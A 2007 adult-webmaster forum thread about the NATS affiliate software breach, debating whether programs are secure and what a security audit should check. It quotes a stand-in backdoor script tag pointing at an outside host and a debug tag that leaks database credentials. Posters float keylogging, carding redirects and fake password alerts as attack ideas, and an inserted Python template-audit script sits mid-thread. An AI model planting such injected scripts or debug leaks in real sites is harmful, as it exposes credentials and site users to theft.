12-26-2007, 12:26 PM   #1
HunkyLuke
Virgin by request ;)
Join Date: Feb 2002
Posts: 1,924
patched & safe NATS programs

Here is the list of affiliate sites that I have heard from so far who have confirmed their NATS installations have been "patched", i.e., all recommended safety precautions have been taken:
HunkMoney
IslandDollars
ZBuckZ
HapiCash

Who else? Please add any other affiliate programs that have confirmed they have addressed this issue, as recommended by TMM. Program owners, if you have already taken actions, please let us know here!

cheers,
Luke

Last edited by HunkyLuke; 12-26-2007 at 12:28 PM..

12-26-2007, 12:46 PM   #2
TheDoc
Too lazy to set a custom title
Join Date: Jul 2001
Location: Currently Incognito
Posts: 13,827
You can add all NATS programs to that list now.

Once TMM found out about this they went in and changed the PW's on programs they had access for. They didn't keep the new info, just fyi.

Everyone else would have had IP protection in place or previously had removed/changed the TMM account details. Meaning the data was already secure.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 01:00 PM   #3
HunkyLuke
Thanks TheDoc, I must have missed that in all the threads recently!

cheers,
Luke

12-26-2007, 01:20 PM   #4
uno
RIP Dodger. BEST.CAT.EVER
Join Date: Dec 2002
Location: NYC Area
Posts: 18,450
Quote:
Originally Posted by TheDoc View Post
You can add all NATS programs to that list now.

Once TMM found out about this they went in and changed the PW's on programs they had access for. They didn't keep the new info, just fyi.

Everyone else would have had IP protection in place or previously had removed/changed the TMM account details. Meaning the data was already secure.
PanchoDog has had IP protection for a very long time.
__________________
-uno
icq: 111-914
CrazyBabe.com - porn art
MojoHost - For all your hosting needs, present and future. Tell them I sent ya!

12-26-2007, 01:23 PM   #5
TheDoc
Quote:
Originally Posted by uno View Post
PanchoDog has had IP protection for a very long time.
Good stuff.. I really think a great deal of clients did use the protection.

I was avoiding listing all the people that I know did use the IP protection. Ya miss a few people and the ICQ's of butt hurt people start
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 01:31 PM   #6
SmokeyTheBear
►SouthOfHeaven
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
wait wait wait , gotta set things straight here.

In my opinion no sponsors are safe until they have had a security audit.

The nats admins usernames were stolen, there are hundreds of places the hacker could have injected code that is still UNACTIVATED. regardless of if the admins have been removed, ip's locked down and patched up..

just because you are patched, doesn't mean you are safe. I suggest all sponsors who want to make sure not only for themselves but for their affiliates should clarify if they had a security audit and what was done in the audit. I suggest that any nats sponsor that was compromised using the nats admins passwords should probably send the bill to nats for the security audit or ask nats to supply you one. but this is only my opinion, I have no idea if nats plans on paying for these.
__________________
hatisblack at yahoo.com

12-26-2007, 03:14 PM   #7
TheDoc
Smokey, I thought about this more.. I agree, but overall... Not really.

They can't run/upload/execute anything without it being a plugin / script uploaded via FTP first. You can't upload or add anything to the system via the NATS admin. Smarty won't run php, can't do includes, won't do redirects.. NATS locked down several exploitable parts of smarty already.

So other than direct join template changes or an iframe exploit in the admin templates (which would take 2 seconds to look and see).. I don't really think they could do much damage this way.

Now, they could have deleted members, webmasters, templates, sites, programs, etc.. A small issue needless to say.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 03:18 PM   #8
Theo
HAL 9000
Join Date: May 2001
Posts: 34,515
TheDoc is right on this.

12-26-2007, 03:32 PM   #9
chri$tian
Confirmed User
Join Date: Aug 2003
Location: Charleston, SC
Posts: 2,468
Our IP protection to the admin of NATS was put in place early last week before this news broke, but I agree with TheDoc.. More needs to be done.
__________________
http://www.3dsex.com

12-26-2007, 03:32 PM   #10
borked
Totally Borked
Join Date: Feb 2005
Posts: 6,284
Quote:
Originally Posted by Soul_Rebel View Post
TheDoc is right on this.
Nope, Smokey is right on this one.

for those of you that don't know Smarty, the template engine for NATS, all one needs to do is add
{debug}
to any template and you've given away a *lot* of info.

A *FULL* security audit is required by *EVERY* programme that runs NATS. Period.
__________________

For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)



All models are wrong, but some are useful. George E.P. Box. p202

12-26-2007, 03:34 PM   #11
borked
Quote:
Originally Posted by AtlasChris View Post
Our IP protection to the admin of NATS was put in place early last week before this news broke, but I agree with TheDoc.. More needs to be done.
I know you guys lock down your MySQL to specific IPs - not everyone is so tight.
__________________

For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)



All models are wrong, but some are useful. George E.P. Box. p202

12-26-2007, 03:37 PM   #12
SmokeyTheBear
Quote:
Originally Posted by TheDoc View Post
So other than direct join template changes or an iframe exploit in the admin templates (which would take 2 seconds to look and see)..
it would only take 2 seconds to look and see obvious non-human logins in the nats admin but they missed that for months right .. if you don't look for things they are hard to see .. if they were smart enough to steal the master nats passwd list and build software to remotely retrieve data on a daily basis from numerous sponsors , it doesn't seem a far stretch they would do something as simple as edit a template and drop in a few backdoor scripts in case the admin ever found out the password list was compromised. in fact i would think that would be the very very first thing they would do..
__________________
hatisblack at yahoo.com

12-26-2007, 03:45 PM   #13
TheDoc
Quote:
Originally Posted by borked View Post
{debug}
This tells you about errors and what smarty calls to make. You can not call everything from the debug menu into a nats template. It isn't a security issue of any kind.

MYSQL has nothing to do with this, nor protecting mysql. The IP lock feature is within the Admin area and instantly stopped this attack from happening.


Quote:
Originally Posted by SmokeyTheBear View Post
it would only take 2 seconds to look and see obvious non-human logins in the nats admin but they missed that for months right .. if you don't look for things they are hard to see .. if they were smart enough to steal the master nats passwd list and build software to remotely retrieve data on a daily basis from numerous sponsors , it doesn't seem a far stretch they would do something as simple as edit a template and drop in a few backdoor scripts in case the admin ever found out the password list was compromised. in fact i would think that would be the very very first thing they would do..
Looking at the logins vs looking at discolored admin templates which never flip ownership, really stands out in NATS. Logins, not so much.

You can't do anything with the templates, you can't execute, upload, backdoor anything. They are nothing more than text files, executed as text/html.

The password list is TMM admin accounts on NATS. Not ALL NATS admin accounts or any other admins, webmasters, etc.. Only the TMM admin accounts were breached.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

Last edited by TheDoc; 12-26-2007 at 03:46 PM..

12-26-2007, 03:50 PM   #14
SmokeyTheBear
Quote:
Originally Posted by TheDoc View Post
You can't do anything with the templates, you can't execute, upload, backdoor anything. They are nothing more than text files, executed as text/html..
script src=http://secretstuff.com/backdoor.js

could be empty right now (i.e unnoticed) and waiting to scoop
__________________
hatisblack at yahoo.com

12-26-2007, 03:51 PM   #15
TheDoc
Quote:
Originally Posted by SmokeyTheBear View Post
script src=http://secretstuff.com/backdoor.js

could be empty right now (i.e unnoticed) and waiting to scoop
What could it do other than run local js on a pc?
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 03:55 PM   #16
TheDoc
Wait, yeah duh, key stroker.. I can check some programs right fast, most people never touch the admin templates so it really only takes a second to look. And I check the access template since it's the first.

Outside of those, unless you point out a different reason, I don't see that this would do anything.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 03:57 PM   #17
SmokeyTheBear
Quote:
Originally Posted by TheDoc View Post
What could it do other than run local js on a pc?
well it could redirect joins that would be pretty bad.

if it redirected the joins to a carding page that would be even worse.
__________________
hatisblack at yahoo.com

12-26-2007, 04:03 PM   #18
borked
Quote:
Originally Posted by TheDoc View Post
This tells you about errors and what smarty calls to make. You can not call everything from the debug menu into a nats template. It isn't a security issue of any kind.

MYSQL has nothing to do with this, nor protecting mysql. The IP lock feature is within the Admin area and instantly stopped this attack from happening.

Oh I'm sorry, maybe I was misreading the $config array output from {debug}

{$config} Array (168)
DB_SERVER => "xxxxxxx"
DB_USER => "xxxxxxx"
DB_PASSWORD => "xxxxxxx"
DB_DB => "xxxxxxx"

My bad, this has nothing to do with mysql at all.
__________________

For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)



All models are wrong, but some are useful. George E.P. Box. p202

12-26-2007, 04:06 PM   #19
TheDoc
Quote:
Originally Posted by SmokeyTheBear View Post
well it could redirect joins that would be pretty bad.

if it redirected the joins to a carding page that would be even worse.
ok, they do need to be checked.. But prob more focused on the join forms, give admin templates a quick one over, and hand check the access template.

Either way though, nobody is uploading, adding code, creating a backdoor, etc. through the NATS admin. However, nasty shit can be done either way.
__________________
~TheDoc - ICQ7765825
It's all disambiguation
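
The template checks argued over in the posts above (a `{debug}` tag exposing `$config`, and a remote script or iframe dropped into a join or admin template), sketched as an audit script. This is an added example, not part of any post and not NATS or Smarty code; the template names, hosts and baseline are constructed, and default Smarty `{ }` delimiters are assumed.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Assumption: default Smarty delimiters. Comments are {* ... *} and are never rendered.
SMARTY_COMMENT = re.compile(r"\{\*.*?\*\}", re.S)
# {debug} or {debug output="html"}: dumps every assigned variable, $config included.
DEBUG_TAG = re.compile(r"\{\s*debug(?:\s[^}]*)?\}", re.I)
# <script>/<iframe> carrying a src attribute, quoted or unquoted.
SRC_TAG = re.compile(r"<\s*(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def _blank(match):
    """Replace a comment with spaces, keeping newlines so line numbers hold."""
    return re.sub(r"[^\n]", " ", match.group())


def audit_template(name, text, allowed_hosts, baseline=None):
    """Return sorted (template, line, kind, detail) findings for one template."""
    findings = []
    body = SMARTY_COMMENT.sub(_blank, text)

    def line(pos):
        return body.count("\n", 0, pos) + 1

    for m in DEBUG_TAG.finditer(body):
        findings.append((name, line(m.start()), "debug-tag", m.group()))

    for m in SRC_TAG.finditer(body):
        tag, src = m.group(1).lower(), m.group(2)
        try:
            host = urlsplit(src).hostname      # None for relative (local) paths
        except ValueError:                     # malformed URL: report it, do not skip
            findings.append((name, line(m.start()), "unparsable-src", src))
            continue
        # A remote file that is empty today still shows up here, because the
        # check is on where the tag points, not on what the file contains.
        if host and host.lower() not in allowed_hosts:
            findings.append((name, line(m.start()), "external-" + tag, src))

    # Optional content check against a known-good copy of the template.
    if baseline is not None:
        digest = hashlib.sha256(text.encode("utf-8")).hexdigest()
        if baseline.get(name) != digest:
            findings.append((name, 0, "differs-from-baseline", digest[:16]))
    return sorted(findings)


# Constructed sample templates; names, hosts and markup are illustrative only.
CLEAN_ACCESS = ('{* {debug} was used during setup *}\n'
                '<script src="js/menu.js"></script>\n<h1>{$title}</h1>\n')
SAMPLES = {
    "admin_access.tpl": CLEAN_ACCESS,
    "admin_header.tpl": ('<div id="hdr">\n{debug}\n'
                         '<IFRAME SRC="//frames.example.invalid/a" width=0></IFRAME>\n'),
    "join_form.tpl": ('<form action="signup.php">\n<input name="email">\n'
                      '<script src=http://static.example.invalid/c.js></script>\n</form>\n'),
}
ALLOWED = {"www.sponsor.example"}
BASELINE = {"admin_access.tpl": hashlib.sha256(CLEAN_ACCESS.encode("utf-8")).hexdigest()}


def run_audit(templates=SAMPLES, allowed_hosts=ALLOWED, baseline=None):
    """Audit every template in the mapping and return all findings in name order."""
    out = []
    for name in sorted(templates):
        out.extend(audit_template(name, templates[name], allowed_hosts, baseline))
    return out


if __name__ == "__main__":
    for finding in run_audit():
        print("%s:%d %s %s" % finding)
```

With a baseline supplied, any template missing from it is reported as differing, so an unexpected new template surfaces as well as an edited one.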

12-26-2007, 04:13 PM   #20
SmokeyTheBear
Quote:
Originally Posted by TheDoc View Post
ok, they do need to be checked.. But prob more focused on the join forms, give admin templates a quick one over, and hand check the access template.
before they are given the all clean.

I don't wanna give away too much but fact is the basics got overlooked or this would have been noticed by both nats and the sponsors themselves ages ago ( or was and was ignored ) if someone was smart they likely knew this wouldn't last forever ( admin access ) , place a small js for a fake " nats update your password security alert" in the admin section , so when sponsors learn of this right now like they have they would think "oh gee this must be legit" wham bam recompromised
__________________
hatisblack at yahoo.com

12-26-2007, 04:16 PM   #21
AlienQ - BANNED FOR LIFE
best designer on GFY
Join Date: Mar 2003
Location: IALIEN.COM - High Definition Video and Photographic Productions -ICQ 78943384
Posts: 30,307
I think this subject is....


12-26-2007, 04:19 PM   #22
will76
Making $$$$ w/ ClickCash
Join Date: May 2003
Location: USA
Posts: 18,037
getting TheDoc to be careful on this issue seems to be near impossible. He has been down playing this from day 1 when he was saying he "seems to believe that only emails were stolen". This thread is a perfect example of someone being too quick to give the " all clear" and wanting the issue to be down played and to go away. If smokey wouldn't have convinced him after several posts, people would be reading the doc's initial posts here saying that all NATS programs were now safe. Another assumption he obviously knows nothing about. I'm not bashing on NATS but i agree with Smokey it would be wise to have an audit of your server to double check everything, where as the doc would tell it is all fine, nothing to worry about.
__________________
ICQ: 86364801 Email: will [at] innovativeassets [dot] com

PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
FNCash | Media Revenue

Last edited by will76; 12-26-2007 at 04:21 PM..

12-26-2007, 04:22 PM   #23
TheDoc
Quote:
Originally Posted by will76 View Post
getting TheDoc to be careful on this issue seems to be near impossible. He has been down playing this from day 1 when he was saying he "seems to believe that only emails were stolen". This thread is a perfect example of someone being too quick to give the " all clear" and wanting the issue to be down played and to go away. If smokey wouldn't have convinced him after several posts, people would be reading the doc's initial posts here saying that all NATS programs were now safe. Another assumption he obviously knows nothing about.
I'm talking to Smokey over ICQ about this well before this post was made. I haven't given the all clear to anything. I'm here to learn so I can educate my clients and NATS on what to do.. Please don't confuse me with some jackass.

I still DON'T think a program needs to do a check. But to be safe they might as well. With the console issue or 1000 other possible problems, the fact remains they ONLY got email / member data.


Don't pull me into your little twisted post games or I will eat you alive and spit your ass back out.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

Last edited by TheDoc; 12-26-2007 at 04:24 PM..

12-26-2007, 04:29 PM   #24
WiredGuy
Pounding Googlebot
Join Date: Aug 2002
Location: Canada
Posts: 34,486
Quote:
Originally Posted by AlienQ View Post
I think this subject is....

I think its just beginning.
WG
__________________
I play with Google.

12-26-2007, 04:30 PM   #25
TheDoc
Quote:
Originally Posted by borked View Post
Oh I'm sorry, maybe I was misreading the $config array output from {debug}

{$config} Array (168)
DB_SERVER => "xxxxxxx"
DB_USER => "xxxxxxx"
DB_PASSWORD => "xxxxxxx"
DB_DB => "xxxxxxx"

My bad, this has nothing to do with mysql at all.
Now back to you.. Interesting and you are correct.

Can it be removed and still have the debug console?

I went in and checked 5 people, only 2 of us (me included) have the debug on. I don't remember turning mine on but I am going to get my host to tell me how to turn it on/off.

I would bet though, now that you pointed this out, more changes will be made. That damn console is handy but that could be deadly.

Again, pointing out at how bad it could have been - vs what it really was.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 04:30 PM   #26
will76
Quote:
Originally Posted by TheDoc View Post
I'm talking to Smokey over ICQ about this well before this post was made. I haven't given the all clear to anything. I'm here to learn so I can educate my clients and NATS on what to do.. Please don't confuse me with some jackass.

I still DON'T think a program needs to do a check. But to be safe they might as well. With the console issue or 1000 other possible problems, the fact remains they ONLY got email / member data.


Don't pull me into your little twisted post games or I will eat you alive and spit your ass back out.
game? here I am telling people to err on caution and you are telling them the complete opposite.


TITLE OF THIS THREAD:
Quote:
patched & safe NATS programs
your reply:
Quote:
Originally Posted by TheDoc View Post
You can add all NATS programs to that list now.
RIGHT FUCKING THERE you say you can add all programs to the safe list. Then after several of smokey's posts you post:
Quote:
ok, they do need to be checked..
Now you are saying

Quote:
I still DON'T think a program needs to do a check.
So you want to resort to personal attacks / threats now? No need for me to play games or twist things when all I need to do is quote you.
__________________
ICQ: 86364801 Email: will [at] innovativeassets [dot] com

PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
FNCash | Media Revenue

12-26-2007, 04:32 PM   #27
TheDoc
Yes, Will76, NATS has been "Patched and is now Safe".. That is 100% correct.

Please take your drama bullshit to another thread and let us adults conduct business.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 04:42 PM   #28
JOKER
Facit Omnia Voluntas
Join Date: Apr 2003
Location: Offshore
Posts: 2,105
Quote:
Originally Posted by TheDoc View Post
I still DON'T think a program needs to do a check. But to be safe they might as well.
And I think giving programs / affiliates a false sense of security might not be the best idea, but of course that's just me.

Quote:
Originally Posted by TheDoc View Post
With the console issue or 1000 other possible problems, the fact remains they ONLY got email / member data.
John himself stated that they had access to everything an admin would have access to - yet you're saying it's a FACT that they only got email / member data - how can you be so sure, have you done a full security audit to programs that you have access to? How can you be so sure, if you don't know what these guys are really capable of?

No offense, really - and believe me, I'd like to see this go away as fast as every other webmaster / program owner as well, it's just that you know, better be safe and 100% sure than sorry.

It's great that there is work being done and that you're a part of it
__________________
Facilitation - BizDev - Traffic - Consulting - Marketing
Skype: jokerempire | Silent Circle: joker


12-26-2007, 04:46 PM   #29
will76
Quote:
Originally Posted by TheDoc View Post
Yes, Will76, NATS has been "Patched and is now Safe".. That is 100% correct.

Please take your drama bullshit to another thread and let us adults conduct business.
That's not at question, if NATS is now safe or not. Maybe you should read the title again: NATS PROGRAMS. Someone was asking which programs using NATS was safe. You saw " NATS and SAFE" and you jumped in to say " ALL OF THEM". Obviously you still don't understand the subject of the thread since your reply is NATS has been "Patched and is now Safe".. no one has disputed that. Everyone knows that it was a password list and that NATS deleted the passwords.

No Drama, and you can continue to reply with insults if you like and try to start a pissing match but I prefer to stick to the topic. Smokey pointed out where people should get their stuff checked. I agree better to be safe and do the right thing. I am just curious why you are so quick to tell people that all programs using NATS on their servers are 100% safe. How do you know that? did you check everyone's servers as smokey mentioned?
__________________
ICQ: 86364801 Email: will [at] innovativeassets [dot] com

PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
FNCash | Media Revenue

Last edited by will76; 12-26-2007 at 04:47 PM..

12-26-2007, 05:12 PM   #30
TheDoc
Quote:
Originally Posted by will76 View Post
That's not at question, if NATS is now safe or not. Maybe you should read the title again: NATS PROGRAMS. Someone was asking which programs using NATS was safe. You saw " NATS and SAFE" and you jumped in to say " ALL OF THEM". Obviously you still don't understand the subject of the thread since your reply is NATS has been "Patched and is now Safe".. no one has disputed that. Everyone knows that it was a password list and that NATS deleted the passwords.

No Drama, and you can continue to reply with insults if you like and try to start a pissing match but I prefer to stick to the topic. Smokey pointed out where people should get their stuff checked. I agree better to be safe and do the right thing. I am just curious why you are so quick to tell people that all programs using NATS on their servers are 100% safe. How do you know that? did you check everyone's servers as smokey mentioned?
I think the question asked was "have confirmed their NATS installations have been "patched", ie, all recommended safety precautions have been taken"

No reason to twist this, the answer again is 100% YES! All NATS programs have had all recommended safety precautions taken.

Everything else is how to IMPROVE on it and find more possible holes that could be exploited.

And I did agree with Smokey, and I agreed that people should check the installs. But I do not think or agree that they will find any problems due to the fact that a human didn't enter the programs, but rather a bot, which pulled information from reports. So even the debug screen is pointless, but that doesn't mean it isn't something that shouldn't be addressed for future problems.


And with you, I didn't say "all clear" as you quoted me saying. So if you want to twist my words I will continue to bash you.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

12-26-2007, 05:31 PM   #31
TheDoc
Quote:
Originally Posted by JOKER | JOKEREMPIRE Inc. View Post
And I think giving programs / affiliates a false sense of security might not be the best idea, but of course that's just me.
The NATS programs that had been breached are now secure, that isn't false.



Quote:
Originally Posted by JOKER | JOKEREMPIRE Inc. View Post
John himself stated that they had access to everything an admin would have access to - yet you're saying it's a FACT that they only got email / member data - how can you be so sure, have you done a full security audit to programs that you have access to? How can you be so sure, if you don't know what these guys are really capable of?
It was a bot, going in and pulling, it appears, 5 reports from the admin/webmaster cvs reports. These reports pull member and webmaster data when transactions come through. I think this is why Webmaster baited emails were hit harder than member emails. Harder to see who is fresh and who isn't with Members, without running an sql query.

Quote:
Originally Posted by JOKER | JOKEREMPIRE Inc. View Post
No offense, really - and believe me, I'd like to see this go away as fast as every other webmaster / program owner as well, it's just that you know, better be safe and 100% sure than sorry.

It's great that there is work being done and that you're a part of it
This needed to happen, NATS needed to improve its security. It doesn't need all these people that have never used NATS telling Webmasters what they view the problem is.

So when people are saying it isn't secure, well.. You are right, but neither is any other affiliate program for that matter, or google, or anyone. So nobody can ever give the 100% all clear vote, we can only state what we know....

That nats is clear of the issue it had and we should all move on and start making more money.
__________________
~TheDoc - ICQ7765825
It's all disambiguation

Last edited by TheDoc; 12-26-2007 at 05:33 PM..

12-26-2007, 06:14 PM   #32
BluMedia
Confirmed User
Join Date: Dec 2002
Location: Colorado
Posts: 3,973
We took action as soon as we heard about the issue. Add IntenseCash to that list.

Mark
__________________
IntenseCash - If you can't convert us then you might want to look for a new job
.
BrokeStraightBoys.com converting 1:124 stats counted by Nats

12-26-2007, 06:30 PM   #33
SkeetSkeet
Confirmed User
Join Date: Oct 2005
Location: StarlightBucks !
Posts: 5,404
we are good to go www.starlightbucks.com
__________________

ICQ 283633188

12-26-2007, 07:47 PM   #34
Trixxxia
Confirmed User
Join Date: Aug 2004
Location: Montreal, Canada
Posts: 5,600
MassiveDollars (and all clients of our host) have IP protection. It can be a pain in the butt sometimes but now I'm sure everyone is GLADLY going to grin rather than growl when they need to get an IP authorized.

Despite knowing we are protected, we meticulously went through all IPs that accessed as admins to make sure everyone checked out and matched. All good there.

Smokey, borked, quantum-x(in some other threads) and TheDoc - thanks for using your collective brains & experience to foresee any 'possible' issues and giving indications of what to look out for. I personally appreciate it and sleep better at night knowing I've dotted my 'i's' and crossed my 't's - EVEN if we were protected. Like JokerEmpire said - Better safe than sorry.